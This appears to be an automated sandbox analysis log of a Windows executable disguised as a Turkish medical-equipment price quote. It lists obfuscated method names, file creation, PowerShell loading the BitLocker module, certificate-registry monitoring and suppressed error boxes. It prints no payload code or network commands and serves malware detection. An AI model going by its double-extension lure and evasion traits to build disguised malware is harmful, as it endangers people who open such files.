                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, ovGAdibW3XVXQYqWOO.csHigh entropy of concatenated method names: 'daMRdgt0r8', 'sMfRHsgDfO', 'fexRoo5Yef', 'jyJRNC9xVY', 'hW3RunJkwe', 'DcqR0fuQyH', 'KHrRB2Pw1N', 'anRRcIivOT', 'Wb3RqSTTUE', 'nJsR1b88Js'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, HRTOxMTE3odfb866U5.csHigh entropy of concatenated method names: 'TtECwM31Hw', 'vTbCf65UYs', 'V90n4yUYV9', 'AOlnXhFpKp', 'HcaC1OVXFo', 'xBdCl20l4O', 'booCbxWPae', 'l1KCMScDMb', 'Ej9CZFDQex', 'D8dCKri3lH'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, wVn35QS6L2AviJCUnX.csHigh entropy of concatenated method names: 'C7c76YtU9R', 'T4g73Glkyk', 'JAm7OKSfTN', 'LNt7sNneIH', 'QLa78Ja7qh', 'GnX7rVEnk4', 'E2n7PtEldC', 'A7v7dqcS1N', 'nmI7H99Xwo', 'UQH7U3DSpm'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, Q92ZEGuR3R0exjdZ2W.csHigh entropy of concatenated method names: 'CuL5evOS9A', 'amE564KOTc', 'x185O37SL8', 'tUW5suQjnw', 'GgN5rGkKPd', 'yV05Pktqhs', 'xx85HoLDRq', 'CQa5UGpBpa', 'KBKX9rYNCPRyoswsU22', 'ARNkAdYmTghI04rHAAN'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, Bvh04s2RPwtMA24VC4.csHigh entropy of concatenated method names: 'Dispose', 'URGXaDZ31B', 'KGfLNFIJC2', 'oL2kaGFCia', 'YkSXfH9CfJ', 'feBXzbn0Ar', 'ProcessDialogKey', 'MZXL4BT5kI', 'q9PLXdKbdo', 'igMLLKlj2q'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, Slj2qPfQHxBUgjbDJa.csHigh entropy of concatenated method names: 'Y0TgGM4kJI', 'kvogkPMryL', 'jLKg5aqY1R', 'DbBg7AyPHw', 'afxgJjCKql', 'P2fgyEyepX', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, OOFLQYze1sefpXqr3a.csHigh entropy of concatenated method names: 'ucHgr4WtCf', 'zRPgddeeeX', 'zMYgHyKsRO', 'KGygombDxn', 'zNigNXvTyu', 'bJJguqxL8m', 'yYrg0K7M3j', 'x3pge1v3SQ', 'QBGg620RuA', 'WLjg309qP4'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, aBT5kIan9PdKbdo5gM.csHigh entropy of concatenated method names: 'sf4Joyiqvf', 'AGTJNC0FmS', 'MkhJFDMk1g', 'MUoJuDSGpH', 'HEgJ0ImxhQ', 'su6JQWgjFG', 'HUGJBQMi0V', 'LLYJc7wE1T', 'CIdJSJDs9p', 'wuwJqR3wpF'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, vS8He9MSluhkl5uLAc.csHigh entropy of concatenated method names: 'BQJVqePRET', 'Cq9VlapZjC', 'zM1VM3y9p2', 'WY0VZMqDUk', 'PNKVNDgUMR', 'OqPVFpWwcV', 'kawVuC65v6', 'iS1V01BaId', 'gNHVQxcHxB', 'coVVBPSiRI'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, fvx3xRxwOmRGDZ31Bf.csHigh entropy of concatenated method names: 'FfiJVHjP4s', 'sM3JCRS2T7', 'cawJJ9sdd7', 'KnvJ9jCyuh', 'o7ZJI9wb9W', 'bTVJeIjoJR', 'Dispose', 'hxgnYxlSFC', 'uKUn2dmIGM', 'KE8nGivjRw'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, xQs4EgLS5JBIGhk6AF.csHigh entropy of concatenated method names: 'qk6Oq6f0d', 'ESFsvkmBp', 'cIcrJ62XR', 's0APGCHVN', 'zBvHwU44p', 'lrjUJIIrG', 'PXCixqlX1YIs6ie8H3', 'sBT9uwqf0auY8SgZ8y', 'dRFCjVUrtg35ttofte', 'qTMn6VW4Y'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, chcZUZyrDJr55lSd5d.csHigh entropy of concatenated method names: 'pVmjptivra', 'PhBjYGyR5j', 'AQIj2eoBNJ', 'iK0jGAc0cP', 'MNhjk8nMoX', 'Fuij5TcgHv', 'K5gj7WQnj6', 'pQ3jyy5F4W', 'utLjED5kVa', 'soojDlZRrJ'
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx _ .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx _ .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx _ .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx _ .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx _ .exeJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx _ .exeJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx _ .exeJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile created: \fiyati_teklif 65tibbi20_ memorial medikal cihaz sipari#u015fi jpeg docx _ .exeJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
